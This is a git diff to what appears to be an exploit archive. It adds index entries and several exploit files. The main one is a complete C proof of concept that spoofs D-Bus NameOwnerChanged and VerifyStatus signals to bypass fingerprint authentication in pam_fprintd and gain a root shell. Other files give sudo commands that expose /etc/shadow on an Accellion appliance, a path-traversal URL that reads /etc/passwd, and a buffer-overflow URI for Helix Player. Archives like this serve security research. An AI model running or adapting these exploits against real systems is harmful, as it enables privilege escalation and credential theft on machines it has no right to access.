diff --git a/files.csv b/files.csv index 53923dd90..4f17aa67f 100755 --- a/files.csv +++ b/files.csv @@ -30282,3 +30282,16 @@ id,file,description,date,author,platform,type,port 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0 +33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 +33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Local Root Exploit",2014-06-02,"Sebastian Krahmer",linux,local,0 +33615,platforms/multiple/remote/33615.txt,"JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability",2010-02-08,apoc,multiple,remote,0 +33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 Space String Remote File Disclosure Vulnerability",2010-02-08,"Pouya Daneshmand",multiple,remote,0 +33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 'index.php' SQL Injection Vulnerability",2010-02-08,alnjm33,php,webapps,0 +33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0 +33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 'login.php' Cross Site Scripting Vulnerability",2010-02-08,vr,php,webapps,0 +33620,platforms/linux/remote/33620.txt,"Helix Player <= 11.0.2 Encoded URI Processing Buffer Overflow Vulnerability",2007-07-03,gwright,linux,remote,0 +33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component 'viewpage.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0 +33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 +33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 +33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 +33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0 diff --git a/platforms/linux/local/33614.c b/platforms/linux/local/33614.c new file mode 100755 index 000000000..5382dc378 --- /dev/null +++ b/platforms/linux/local/33614.c @@ -0,0 +1,161 @@ +/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role. + * + * (C) 2013 Sebastian Krahmer, all rights reversed. + * + * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and + * registers DBUS signal inside the PAM authentication function: + * + * dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL); + * dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL); + * dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result), + * data, NULL); + * + * Then, when the DBUS signal arrives, the signal argument is basically just checked + * to be the "verify-match" string; which however is expected to come from the legit + * net.reactivated.Fprint service. Since there is no message filter registered in either + * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed + * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal + * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our + * sender-name (which cannot be spoofed) inside its hash tables and match it to + * net.reactivated.Fprint. + * + * To test this PoC, start a service (su is fine) as user that is using pam_fprintd. + * On a second xterm, when you see 'Swipe your ... finger' message start this PoC + * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p + * + * Used various DBUS tutorials and example code, while writing this. + * + * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall + * + */ + +#include +#include +#include +#include +#include +#include + + +void die(const char *s) +{ + perror(s); + exit(errno); +} + + +int main(int argc, char **argv) +{ + DBusError err; + DBusConnection *conn = NULL; + DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL; + dbus_uint32_t serial = 0; + dbus_bool_t t = 1; + int un = 0, i = 0, reply_to = -1; + const char *vrfy_match = "verify-match", *cname = NULL, + *name = "net.reactivated.Fprint", *prev_owner = NULL; + char dest[32]; + + /* override unique name of net.reactivated.Fprint */ + if (argc > 1) + prev_owner = strdup(argv[1]); + + printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n"); + + printf("[*] Initializing DBUS ...\n"); + dbus_error_init(&err); + conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err); + + if (dbus_error_is_set(&err)) { + fprintf(stderr, "Error: %s\n", err.message); + die("dbus_error_is_set"); + } + + if ((cname = dbus_bus_get_unique_name(conn)) == NULL) + die("dbus_bus_get_unique_name"); + + un = atoi(strchr(cname, '.') + 1); + + printf("[+] Done. Found my unique name: %s (%d)\n", cname, un); + + if (!prev_owner) { + printf("[*] Trying to find unique name of '%s' ...\n", name); + nl_msg = dbus_message_new_method_call("org.freedesktop.DBus", + "/org/freedesktop/DBus", + "org.freedesktop.DBus", + "GetNameOwner"); + + if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args"); + + reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err); + dbus_message_unref(nl_msg); + + if (dbus_error_is_set(&err)) { + fprintf (stderr, "[-] Error: %s\n", err.message); + die("[-] dbus_connection_send_with_reply_and_block"); + } + + if (!dbus_message_get_args(reply, &err, + DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) { + fprintf(stderr, "[-] Error: %s\n", err.message); + die("[-] dbus_message_get_args"); + } + + dbus_message_unref(reply); + } + + printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner); + + for (i = 1; i < 20; ++i) { + /* spoof a NameOwnerChanged signal */ + noc_msg = dbus_message_new_signal("/org/freedesktop/DBus", + "org.freedesktop.DBus", + "NameOwnerChanged"); + + /* spoof a VerifyStatus */ + vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0", + "net.reactivated.Fprint.Device", + "VerifyStatus"); + + if (!vrfy_msg || !noc_msg) + die("[-] dbus_message_new_signal"); + + if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING, + &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args1"); + + if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match, + DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID)) + die("[-] dbus_message_append_args2"); + + /* iterate over unique names short below under our own + * to hit the previously started su + */ + snprintf(dest, sizeof(dest), ":1.%d", un - i); + printf("[*] Using new destination: %s\n", dest); + + if (!dbus_message_set_destination(vrfy_msg, dest)) + die("[-] dbus_message_set_destination"); + + if (!dbus_message_set_destination(noc_msg, dest)) + die("[-] dbus_message_set_destination"); + + if (!dbus_connection_send(conn, noc_msg, &serial)) + die("[-] dbus_connection_send"); + + dbus_connection_flush(conn); + usleep(1000); + + if (!dbus_connection_send(conn, vrfy_msg, &serial)) + die("[-] dbus_connection_send"); + + dbus_connection_flush(conn); + + dbus_message_unref(vrfy_msg); + dbus_message_unref(noc_msg); + } + + printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n"); + return 0; +} \ No newline at end of file diff --git a/platforms/linux/local/33623.txt b/platforms/linux/local/33623.txt new file mode 100755 index 000000000..1f8701474 --- /dev/null +++ b/platforms/linux/local/33623.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/38176/info + +Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: + +- Multiple privilege-escalation issues +- A directory-traversal issue +- An HTML-injection issue +- A remote command-injection issue + +An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. + +The following proofs of concept are available: + +sh-2.05b$ ln /etc/shadow /home/admin/oldtemp +sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp + +sh-2.05b$ ln /etc/shadow /home/admin/temp +sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf + +sh-2.05b$ sudo /usr/local/bin/admin.pl diff --git a/platforms/linux/remote/33620.txt b/platforms/linux/remote/33620.txt new file mode 100755 index 000000000..b149ab703 --- /dev/null +++ b/platforms/linux/remote/33620.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38161/info + +Helix Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successful exploits may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. + + +The following example URI is available: + +http://AAA.BBB.CCC.DDD:EEEE/%.20000000s% + diff --git a/platforms/linux/remote/33622.txt b/platforms/linux/remote/33622.txt new file mode 100755 index 000000000..2fdf8db16 --- /dev/null +++ b/platforms/linux/remote/33622.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/38176/info + +Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: + +- Multiple privilege-escalation issues +- A directory-traversal issue +- An HTML-injection issue +- A remote command-injection issue + +An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. + +https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/multiple/remote/33615.txt b/platforms/multiple/remote/33615.txt new file mode 100755 index 000000000..6818d8ccf --- /dev/null +++ b/platforms/multiple/remote/33615.txt @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/38143/info + +JDownloader is prone to a vulnerability that lets remote attackers execute arbitrary code. + +Attackers can exploit this issue to execute arbitrary code within the context of the affected webserver process. + +Versions prior to JDownloader 0.9.334 are vulnerable. + +
+